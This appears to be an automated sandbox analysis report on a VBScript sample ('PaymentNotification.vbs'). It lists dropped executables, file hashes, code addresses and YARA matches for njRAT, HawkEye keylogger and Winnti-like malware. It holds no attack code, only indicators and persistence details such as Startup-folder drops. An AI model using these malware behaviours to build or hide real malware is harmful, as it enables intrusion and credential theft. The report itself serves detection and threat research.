Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E650D	3_2_00007FFD067E650D
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E792A	3_2_00007FFD067E792A
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E61D3	3_2_00007FFD067E61D3
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E1E55	3_2_00007FFD067E1E55
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 8_2_00007FFD06800ADD	8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 8_2_00007FFD06803985	8_2_00007FFD06803985
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe	Code function: 8_2_00007FFD06801E55	8_2_00007FFD06801E55
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_006E5DCA	12_2_006E5DCA
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F4D5E0	12_2_00F4D5E0
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F49530	12_2_00F49530
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F48C60	12_2_00F48C60
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F4F298	12_2_00F4F298
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Code function: 12_2_00F48918	12_2_00F48918
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008AD426	13_2_008AD426
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008BD5AE	13_2_008BD5AE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008AD523	13_2_008AD523
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008B7646	13_2_008B7646
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008E29BE	13_2_008E29BE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008E6AF4	13_2_008E6AF4
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0090ABFC	13_2_0090ABFC
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903CBE	13_2_00903CBE
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903C4D	13_2_00903C4D
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903DC0	13_2_00903DC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008AED03	13_2_008AED03
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_00903D2F	13_2_00903D2F
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008ACF92	13_2_008ACF92
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008BAFA6	13_2_008BAFA6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_0102639C	13_2_0102639C
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C96048	13_2_02C96048
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C95758	13_2_02C95758
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C97C30	13_2_02C97C30
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C97089	13_2_02C97089
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C97098	13_2_02C97098
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C91D9A	13_2_02C91D9A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02C91DA8	13_2_02C91DA8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_008DC7BC	13_2_008DC7BC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404DDB	14_2_00404DDB
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_0040BD8A	14_2_0040BD8A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404E4C	14_2_00404E4C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404EBD	14_2_00404EBD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: 14_2_00404F4E	14_2_00404F4E

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Tmp.exe 2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\pgr.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: String function: 00411538 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: String function: 008EBA9D appears 35 times

Source: PaymentNotification.vbs

Initial sample: Strings found which are bigger than 50

Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616200946.0000000008100000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0000000D.00000002.616252308.0000000008150000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY	Matched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Winnti_Sample_May18_1 date = 2018-05-04, hash1 = 528d9eaaac67716e6b37dd562770190318c8766fa1b2f33c0974f7d5f6725d41, author = Florian Roth, description = Detects malware sample from Burning Umbrella report - Generic Winnti Rule, reference = https://401trg.pw/burning-umbrella/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
